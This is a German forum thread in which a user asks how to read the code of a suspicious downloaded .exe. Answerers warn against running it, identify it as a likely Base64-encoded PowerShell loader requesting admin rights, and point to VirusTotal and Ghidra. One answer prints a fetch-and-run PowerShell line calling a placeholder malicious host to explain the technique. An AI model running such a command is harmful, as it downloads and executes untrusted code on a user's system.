exe code decrypten?

Hey, ich habe mir etwas Gedownlaoded, was mir unseriös erscheint.

Die Datei beeinhaltet eine .exe Datei.

Wenn ich mir den Code auf dieser exe file anschauen will, dann ist es Encrypted und man erkennt nicht was im code alles drinsteht.

Deshalb wollte ich mal nachfragen, wie man das Decrypten kanny damit man den ganzen code lesen kann?

Ich danke schon mal im voraus für alle Antworten!

06.01.2025, 05:20

Decrypten

06.01.2025, 05:22

so sieht der code circa aus:

2 Antworten

Vom Beitragsersteller als hilfreich ausgezeichnet

Erzesel

Von gutefrage auf Grund seines Wissens auf einem Fachgebiet ausgezeichneter Nutzer

Computer, Programmiersprache, Programmieren & Softwareentwicklung

06.01.2025, 07:52

Die Exe keinesfalls ausführen!

In Deinem Fall handelt es sich bei Deiner .exe-Datei um einen Loader für ein enthaltenes Base64-codiertetes Poershell-KommendozeilenScript.

https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/

Base64 lässt sich relativ simpel decodieren.

Verdächtig ist jedoch, das eine solche Kommando innerhalb eine exe versteckt wird. Normalerweise macht sich kein Programmierer die Mühe ein Powershell-Script in eine exe zu compilieren.

Für Angreifer ist Powershell ein beliebtes Mittel um komplexe Aufgaben, wie das Nachladen und ausführen von Code direkt aus dem Netz mit wenigen kleinen Befehlen zu erledigen. (Invoke-WebRequest)

iex $((iwr 'www.schadcode.de/gift.txt').Content)

...soviel zur Theorie.

Derartiger Code wird in der Regel von keinem Antivirusprogramm moniert, da Powershellscript zum Normalen Werkzeug eines Administrators gehört und auch Base64-Codierung normal verwendet wird um komplexe Scripte frei von Sonderzeichen zu transportieren.

Ich mach mir nicht die Mühe den Buchstabensalat abzutippen, um zu schauen was drin ist. (Zumal es sich mit großer Wahrscheinlichkeit ohnehin um in meiner Codebox gezeigte Technik handelt. ---oft mehrfach hintereinander geschaltet).

Aus den in Deinem Screenshot enthaltenen Daten geht hervor, das deine Exe-Datei Adminrechte anfordert! ...ein weiteres Indiz für mögliche Gefahren. (Unkontrolliertes Powershell mit Adminrechten ist quasi göttlich)

Mehr muss man eigentlich nicht sehen um ein "Finger weg" auszurufen

Ja dass alles erkennt man ganz ohne Decompiler und cracking.

Von Experte Krabat693 bestätigt

Computihack

Nutzer, der sehr aktiv auf gutefrage ist

im Thema Informatik

06.01.2025, 05:21

was meijnst du mit encrypted? Redest du davon, dass du die Dateien im editor geöffnet hast un da komische Symbole waren?

Dass kommt daher, das die Datei eine binär Datei ist, und die bytes in Buchstaben und Symbole umgewandelt werden wenn du die Datei öffnest mit nem editor.

Den Inhalt kannst du z.b. mit einem hex editor ansehen, oder du kannst versuchen z.b. mit ghidra das Programm zu Dekompilieren..

Zudem besteht die Möglichkeit mehr infos zu bekommen indem du die mit virustotal analysieren lässt.

Woher ich das weiß:Studium / Ausbildung – Information Engineering Studium

Erzesel

06.01.2025, 08:01

Der eigentliche enthaltene problematische Powershell-Aufruf ist relativ deutlich als String in der exe definiert. Mit etwas copy und paste wäre es ein leichtes den Base64-Code in Scriptcode umzuwandeln. ...und diesen (mit gezielten Haltepunkten und gesperrten "iex"/Scripblock-execution ) auszutesten.

Aus Erfahrung und ohne decodieren durfte es sich um Code zum Nachladen von anderem Code aus dem Netz handeln.

Computihack

06.01.2025, 18:40

@Erzesel

Hab die Antwort geschrieben bevor das Bild gepostet wurde. Abgesehen davon, hoffe ich dass du Verständnis dafür hast, das ich den Bass 64 String nicht abschreiben werde.

Domi1712

Beitragsersteller

06.01.2025, 05:24

Ok versuche ich mal, danke.

ich versuche halt zu überprüfen ob im Code etwas unerwünschtes steht und es meine Informationen grabbt. habe auch ein Bild ergänzt, falls du etwas schon so draus lesen kannst.

Computihack

06.01.2025, 05:25

@Domi1712

Das kannst du eher mit virus total herausfinden. Denn ich gehe mal davon aus dass du asambly und low level c code nicht lesen kannst, oder?

Domi1712

Beitragsersteller

06.01.2025, 05:29

@Computihack

Nein das kann ich nicht, ich habe mir erhofft etwas da raus zu lesen so in etwa um zu schauen ob es Sicherheitssysteme manipuliert oder der Code komisch ist.

Kannst du denn etwas vom Code im Bild etwas direktes erkennen?

Computihack

06.01.2025, 05:33

@Domi1712

Auf dem bild ist kein code zu erkennen, zumindest nicht direkt, und indirekt auch eigentlich nicht.

Wie gesagt lade die Datei auf virus total hoch.

Die der code ist kompiliert., das heist, ohne die einzelnen bytes zusehen, oder eher ohne das Programm zu dekompilierren, kann man nichts viel sagen. Und selbst dann, braucht es ein geschultes talent um damit etwas anzufangen.

Mehr zum reverse engineering https://www.youtube.com/watch?v=rnR3T4CWu6s&t=77s

Ähnliche Beiträge

C++ Code hat plötzlich kein Zugriff auf seine .exe Datei?

Es hat eigentlich gut geklappt. Als ich meinen Code Überprüfen wollte kam plötzlich die Fehlermeldung:

____________________________________________________________________________________

Fehler LNK1168

C:\Users\(MeinName)\Documents\Programieren\C++\Vokabeltrainer\CodeVerschlüssler\CodeVerschlüssler\x64\Debug\CodeVerschlüssler.exe"

kann nicht zum Schreiben geöffnet werden. CodeVerschlüssler C:\Users\(MeinName)\Documents\Programieren\C++\Vokabeltrainer\CodeVerschlüssler\CodeVerschlüssler\CodeVerschlüssler\LINK 1

____________________________________________________________________________________

Was soll ich tun?

Ich hab auch schon VisualStudio neu gestartet. Hat halt nichts gebracht.

...zum Beitrag

python datei erstellen?

hallo,

ich bin gerade an einem python project, brauche aber hilfe bei einer sache,

ich möchte mit einem python code eine neue python file mit code erstellen lassen

kann mir jmd helfen??

...zum Beitrag

Visual Studio Code: Python-Code immer automatisch speichern?

Ich habe gerade erst begonnen, mit Python zu programmieren, aber immer wenn ich einen neuen Code speichere bzw. ausführen möchte, muss ich zuerst die Datei speichern (File Save) und sie dann ausführen.

...zum Beitrag

VS-Code findet Datei zum compilieren im Pfad nicht obwohl der Pfad der im Dateimanager kopierte Pfad zur Datei ist?

Hi, ich lern gerade Programmieren in VS-Code und habe mir als erste Sprache C ausgesucht. Ich versuche jetzt seit gut zwei Tagen, mein erstes kleines miniprogramm was schon automatisch da steht, zum laufen zu bringen, allerdings klappt da etwas nicht, vscode findet nähmlich die datei im angegeben Pfad nicht und spuckt mir immer wieder diese Fehlermeldung im Ausgabe Bereich aus (Bild1) wenn ich es versuche mit code runner zu starten

[Running] cd "c:\Users\LaughBoy\programmieren mit c\" && gcc zweiter_versuch.c -o zweiter_versuch && "c:\Users\Jojo\programmieren mit c\"zweiter_versuch

gcc: error: CreateProcess: No such file or directory

vorher hab ich schon noch den complier MinGW runtergeladen, weil vorher der complier komplett gefehlt hat, damit habe ich dann versucht die datei zu kompilieren und zwar im Terminalbereich mit powershell, da bekomm ich aber immer diese Fehlermeldung:

PS C:\Users\Jojo\programmieren mit c> gcc -o erster_code "C:\Users\Jojo\programmieren mit c\erster_code"

gcc.exe: error: C:\Users\Jojo\programmieren mit c\erster_code: No such file or directory

gcc.exe: fatal error: no input files

compilation terminated.

[Done] exited with code=1 in 0.074 seconds

ich bin mittlerweile komplett verwirrt und freue mich über Hilfe ich probier auch gerne was anderes von ganz vorne aus falls es an MinGW liegt, hauptsache ich kann endlich Anfangen mit C zu programmieren. Danke im vorraus.

Lg. LaughBoy

...zum Beitrag

.exe file online hosten?

Könnte mir jemand Optionen empfehlen wie ich kostengünstig eine exe Datei online hosten könnte die 24/7 läuft? Es handelt sich dabei um einen bot und ich möchte nicht meinen pc die ganze Zeit anlassen dafür.

...zum Beitrag

Kann man eine Python .exe entschlüsseln und den Code sehen?

Hallo,

kann man eine Python .exe Datei entschlüsseln und somit den Code sehen?
Falls ja, gibt es eine Möglichkeit den Code unlesbar zu machen?

Liebe Grüße

...zum Beitrag

Code einer EXE-Datei auslesen?

Guten Abend,

meine Frage:

Kann ich einen lesbaren Code (Z.B. C++, kein Binär, hexa etc.) aus einer EXE-Datei mir anzeigen lassen? Wenn ja wie und womit?

LG und noch einen schönen Abend ;-)

...zum Beitrag

C# kann Variable in der selben Klasse nicht benutzen?

Moin,

Bin grad dran einen Launcher zu erstellen und hab eine Funktion gemacht womit man eine Exe Datei wählen kann die als String Variable namens filePath gespeichert wird, wenn ich diese rufen will damit der Launch Button weiß was er starten soll bekomme ich den Error "Der Name "filePath" ist im aktuellen Kontext nicht vorhanden."

Wie kann ich hin bekommen das die Variable von der gesamten Klasse verwendet werden kann?

Code in Frage:

        private void button8_Click(object sender, EventArgs e)
        {
            using (OpenFileDialog openFileDialog = new OpenFileDialog())
            {
                openFileDialog.InitialDirectory = "c:\\";
                openFileDialog.Filter = "Exe Files (.exe)|*.exe"; ;
                openFileDialog.FilterIndex = 2;
                openFileDialog.RestoreDirectory = true;


                if (openFileDialog.ShowDialog() == DialogResult.OK)
                {
                    String filePath = openFileDialog.FileName;
                    textBox1.Text = filePath;
                }
            }
        }


        private void button7_Click(object sender, EventArgs e)
        {
            string WindowsUser = Environment.UserName;
            string GameName = "Game";
            System.Diagnostics.Process.Start($@"C:\Users\{WindowsUser}\AppData\Local\{GameName}\Saved\SaveGames.");
        }


        private void button1_Click(object sender, EventArgs e)
        {
            System.Diagnostics.Process.Start($"{filePath}");
        }
    }
}

...zum Beitrag

Aus EXE den C# Programmierung herauslesen

Hallo,

Kennt jemand von euch ein Programm das mir den C# Text einer Exe Datei anzeigen lässt. Zb. ich habe eine Windows Forms Anwendung programmiert und da habe ich auch eine Exe welche ohne den Code Funktioniert also bedeutet dies das der Code in dem Exe File drinnen sein muss. Besteht da eine Möglichkeit diesen herauszulesen?

...zum Beitrag

Sounddateien in exe datei einpflegen?

Guten Tag,

Ich habe eine einfache kleine exe datei erstellt mithilfe vom Editor und .bat dateien.

Sobald man die exe datei ausführt öffnen sich somit ein paar Seiten im Internet und es sollten einige sounds abgespielt werden.

Mein Problem:

Wie erstelle ich eine exe datei, die die Audiodateien drin hat und sie im richtigen Pfad abspeichert das sie abgespielt werden kann durch den .bat code?

OS: Windows 10 64-bit

Vielen dank!

Dies ist der simple code, die ersten 3 Zeilen sollen die besagten Sounds sein.

mfg Simon

...zum Beitrag

Python - tkinter text eingabe in variable?

Hallo,

ich habe folgendes programmiert:

import tkinter as tk
import os


root = tk.Tk()
root.geometry("400x240")


def encrypt(filename):
    to_encrypt = open(filename, "rb").read()
    size = len(to_encrypt)
    key = os.urandom(size)
    with open(filename + ".lqk", "wb") as key_out:
        key_out.write(key)
    encrypted = bytes(a ^ b for (a, b) in zip(to_encrypt, key))
    with open(filename, "wb") as encrypted_out:
        encrypted_out.write(encrypted)  
    filename = textExample.get(1.0, tk.END+"-1c")
    encrypt(filename)




def decrypt(filename, key):
    file = open(filename, "rb").read()
    key = open(key, "rb").read()
    decrypted = bytes(a ^ b for (a, b) in zip(file, key))
    with open(filename, "wb") as decrypted_out:
        decrypted_out.write(decrypted)
    fileTest = filename + ".lqk"
    try:
        os.remove(fileTest)
    except OSError as e:
        print(e)
    else:
        print("Datei erfolgreich gelöscht!")
    filename = textExample.get(1.0, tk.END+"-1c")
    decrypt(filename, filename + ".lqk")
    
    


textExample=tk.Text(root, height=10)
textExample.pack()
btnEncrypt=tk.Button(root, height=1, width=10, text="Encrypt", 
                    command=encrypt)
btnDecrypt=tk.Button(root, height=1, width=10, text="Decrypt", 
                    command=decrypt)


btnEncrypt.pack()
btnDecrypt.pack()


root.mainloop()

Nur leider funktioniert dies nicht. In der Debugging Console bekomme ich folgende Fehlermeldung:

Bei der Encrypt Funktion:

PS C:\Users\elias\Desktop\Python>  c:; cd 'c:\Users\elias\Desktop\Python'; & 'C:\Users\elias\AppData\Local\Programs\Python\Python310\python.exe' 'c:\Users\elias\.vscode\extensions\ms-python.python-2021.12.1559732655\pythonFiles\lib\python\debugpy\launcher' '52518' '--' 'c:\Users\elias\Desktop\Python\main.py'
Exception in Tkinter callback
Traceback (most recent call last):
  File "C:\Users\elias\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 1921, in __call__
    return self.func(*args)
TypeError: encrypt() missing 1 required positional argument: 'filename'

Decrypt Funktion:

Traceback (most recent call last):
  File "C:\Users\elias\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 1921, in __call__
    return self.func(*args)
TypeError: decrypt() missing 2 required positional arguments: 'filename' and 'key'

Wie kann ich das Problem jetzt lösen?

Danke im Vorraus!

VG!

...zum Beitrag

Programm von Künstlicher Intelligenz schreiben lassen?

Ich habe mir von der KI www.Godmode.Space eine kleines Programm schreiben lassen. Nach 20-30 min meinte die KI sie wäre fertig.
Hab jetzt insgesamt 18 einzelnen kleine Dateien mit der Endung .py (denke mal Pyton Code)

Wie bringe ich jetzt die einzelnen Dateien zu einem Programm zusammen? Hatte der KI als sie meinte sie wäre fertig die letzte Aufgabe gestellt das sie eine File zum Runterladen erstellen soll. Sie hat mit aber nur wieder eine Datei mit Endung .py erstellt (das war dann Nummer 18).

Was muss ich jetzt machen um das ganze zu einem Programm zusammen zubekommen?

...zum Beitrag

Python XML-Dateien lesen?

Hallo,

Wie kann man in Python XML-Dateien lesen. Ich habe mir dafür schon ein paar Tutorials durchgelesen, aber bei dem das ich verwenden möchte sagt mein Python-Interpreter die ganze Zeit:

 File "C:\Users\toni-\source\repos\PythonApplication1\PythonApplication1\PythonApplication1.py", line 32, in <module>
  value = b_name.get('qty')
AttributeError: 'NoneType' object has no attribute 'get'

Wist ihr woran es liegt?

Hier das Tutorial:

Lesen und Schreiben von XML-Dateien in Python – Acervo Lima

Danke für eine Antwort

TheCPP

...zum Beitrag

C#, Datei auf Desktop kopieren, umbenennen, ausführen?

Guten Tag,

Ich habe wirklich keine Ahnung mehr, was ich noch probieren könnte / was falsch ist:

// Datei + Ziel festlegen
string Name = "NoRecoil-R6S.exe";
string Path = Environment.SpecialFolder.Desktop.ToString();
string Stream = System.IO.Path.Combine(System.Windows.Forms.Application.StartupPath, "Resources");

// Auf Desktop kopieren
string File = System.IO.Path.Combine(Stream, Name);
string destFile = System.IO.Path.Combine(Path, Name);
System.IO.File.Copy(File, destFile, true);

// Umbenennen
if (System.IO.File.Exists(Path + code + ".exe"))
{
  System.IO.File.Move(destFile, Path + code + ".exe");
}
else
{
  MessageBox.Show("File does not exist on Desktop.");
}

// Starten
if (System.IO.File.Exists(Path + code + ".exe"))
{
  Process.Start(Path + code + ".exe");
}
else 
{
  MessageBox.Show("File does not exist on Desktop.");
}

this.Hide();

Der Fehler entsteht beim Schritt, wo er die Datei kopieren will. Hab ich da etwas am Pfad vertauscht? Ist irgendwie das einzig mögliche, oder? Habe die Pfade mehrmals überprüft und nie einen Fehler gefunden.

Fehler: Er findet die Datei auf dem Desktop nicht, obwohl er sie ja dahin kopieren sollte.

...zum Beitrag

Was möchtest Du wissen?

Deine Frage stellen